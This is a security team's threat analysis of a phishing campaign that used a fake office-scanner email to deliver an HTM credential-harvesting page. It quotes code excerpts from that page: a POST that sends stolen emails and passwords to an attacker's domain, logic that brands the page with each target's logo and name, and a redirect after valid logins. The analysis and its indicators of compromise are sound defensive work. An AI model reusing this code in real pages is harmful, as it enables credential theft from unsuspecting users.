When Your Office Scanner Is Framed for Phishing

FLM Security Team
2020-05-19

Malicious actors have been leveraging the 'scan to email' functionality of document-handling office equipment like scanners and copiers for the better part of a decade as bait to convince targeted users to install malware on their machines. Recently however, we have noticed staff receive emails which use a similar bait but with the intention being not malware installation but account credential phishing (targeting Microsoft Live accounts), illustrating that this particular attack vector has evolved from malware payloads to compromising account credentials.

The Email Bait

Recently, staff received an email letting them know that they have had a scanned document ready, with the scan purportedly being done on the 'Theintercept DocuCentre-SCANFX-2EFF73' scanner, located at the 'Frontdesk'. The email includes an HTM file as an attachment, and claims to have come from 'Theintercept Sharepoint Scanner'.

Screenshot of the phishing email bait

The sender name, 'Theintercept Sharepoint Scanner' attempts to leverage the capability of various scanners to send documents to a Microsoft SharePoint library. Xerox, the brand being spoofed in the phishing email, has precisely such a feature. A small red flag at this stage is that SharePoint has been misstylized as 'Sharepoint' and that the message contains irregular capitalization ("A New File was Scanned to you").

Taking a closer look at the From field reveals that the email came not from an internal company email but from no-reply-exchangelab-apcprd01.documentation.protection.ocbc35853@phumaianh-vn[.]com. The long, 64 character username seems designed to obfuscate that the domain name does not match the company domain that the email claims to be from (in our case, the email is claiming to come from The Intercept).

The From field of the phishing email

The Phishing Payload

Viewing the page source of the payload HTM file reveals that the phishing page deploys rudimentary obfuscation by using percent-encoding for multiple characters in the source code.

Excerpt of obfuscated phishing page source code

Unescaping the code reveals the human-readable page source, as no further obfuscation techniques were used by the phisher.

Excerpt of deobfuscated phishing page source code

If the user opens the HTM file, they are presented with a login prompt atop a blurred document background.

Phishing landing page

The blurred document background appears designed to be a blurred representation of Adobe Acrobat, with the login overlay placed to make the user think the document will appear after they login.

A document open in Adobe Acrobat, the appearance of which the phishing campaign mimics

The blurred background image is loaded via the following code:

<div class="row" style="background-image: url('https://app.forexliteoptions.com/core/database/xero/images/8.jpg'); background-size: cover;background-repeat: no-repeat;">

The presence of other suspect files located in the unprotected ../xero/ directory indicates that the forexliteoption[.]com domain may have been compromised by the attacker to facilitate their phishing campaigns.

There are a number of further notable minor flourishes on the phishing login page. The first is that the email address is prefilled for the user. This has the added benefit for the phisher of every instance of the malicious HTM file being unique, as well as fostering additional automatic customization of the phishing page.

Phishing page login prompt

The top of the login prompt is adorned with the target organization's logo, while the title of the login prompt includes the organization's name (though with incorrect spacing). These customization effects are achieved via the following code:

  var email=$("#email").val();
  console.log(email);
  var domain = email.substring(email.lastIndexOf("@") +1);
  var frmsite = domain.substring(0, domain.lastIndexOf("."));
  document.getElementById("fieldImg").src = `https://api.statvoo.com/favicon/?url=${domain}`;
  document.getElementById("head-message").innerHTML = `${ucFirst(frmsite)} Secured Document`

The phishing page uses the prefilled in email to parse the domain, and then uses the domain to populate the '... Secured Document' title field as well as to fetch the favicon from the domain and insert it into the top of the login prompt. The phishing page uses's Statvoo's API (which in turn makes a call to https://www.google.com/s2/favicons?sz=64&domain_url=) to fetch the favicon. Ironically, Statvoo, which provides website reviews and statistics, is designed to "Avoid online scams and unsafe websites".

If the user enters their password and presses the Login button, the button changes to say that it is 'Verifing' (succumbing to the common phishing red flag of basic misspelling).

Misspelled phishing page button

The phishing page then passes on the user credentials to a third-party site:

       {
         $.ajax({
          dataType: 'JSON',
          url: 'https://server.bossthraed.com/kelval.php',
          type: 'POST',
          data:{
            email:email,
            password:password,
            detail:detail,

          }

The PHP script located on bossthraed[.]com then provides a given signal response. If the response received is no-auth, meaning that the credentials are invalid, the phishing page displays a message that the credentials are incorrect (the exact message wording is relayed from the PHP script, not hardcoded into the phishing page), prompting the user to enter them again. This represents a relative sophistication of the phishing campaign — the attacker's script is able to test the legitimacy of the user credentials in real-time, and to then only harvest working credentials.

Invalid credentials phishing page response message

If, however, the phishing page receives the success signal meaning that the attacker's script has determined that the entered credentials are valid, the phishing page then appears to redirect to a PDF file hosted on Microsoft OneDrive. 

               if(response['signal'] == 'success'){
                 $('#msg').html(response['msg']);
                 $("#msg").show();
                 $('#msg').addClass( 'alert-success' );
                 $(".modal-header").addClass('hide');
                 setTimeout('window.location.href=\x27https://onedrive.live.com/redir?resid227BFC55B5&ithint&authkey=!AEPvKF_OtOAaCH0==file,pdfE87969!134&e=GXnFAo\x27;', 0x5dc);
                 
                }

The OneDrive link is no longer valid, now returning a "This item might not exist or is no longer available" response, and so we are unable to go any further in the campaign and see what the document actually was — if the document link was ever working in the first place.

Summary of Findings

  • The phishing campaign attempts to leverage the 'scan to email' functionality of modern office document-handling equipment as the bait text to lure users into opening an attachment which contains a credential-harvesting phishing page.
  • The phishing page employs basic customization via inserting the target domain into the title of the login page as well as using the target domain's favicon.
  • A script hosted on another domain checks the validity of the inputted credentials in real-time, and redirects the user to a document only upon entry of valid credentials, otherwise displaying an 'incorrect password' error.

Indicators of Compromise (IOCs)

Documents

Filename: theintercept-Scanned.htm

SHA256 Checksum: d19c858559435cc2d4ef11c00afe06ccf5d54a73b8c6fd6c6be5aa72f88a16ff

Note: As the phishing HTM file comes prefilled with the target's email, each document will be unique.

Domains

  • bossthraed[.]com The domain which receives the harvested user login credentials.
  • forexliteoptions[.]com The domain used to store images and other files for the phishing campaign.
  • onedrive.live[.]com/redir?resid227BFC55B5&ithint&authkey=!AEPvKF_OtOAaCH0==file,pdfE87969!134&e=GXnFAo The file that the user is finally redirected to upon entering valid credentials on the phishing site.
  • phumaianh-vn[.]com The domain used to send the bait email.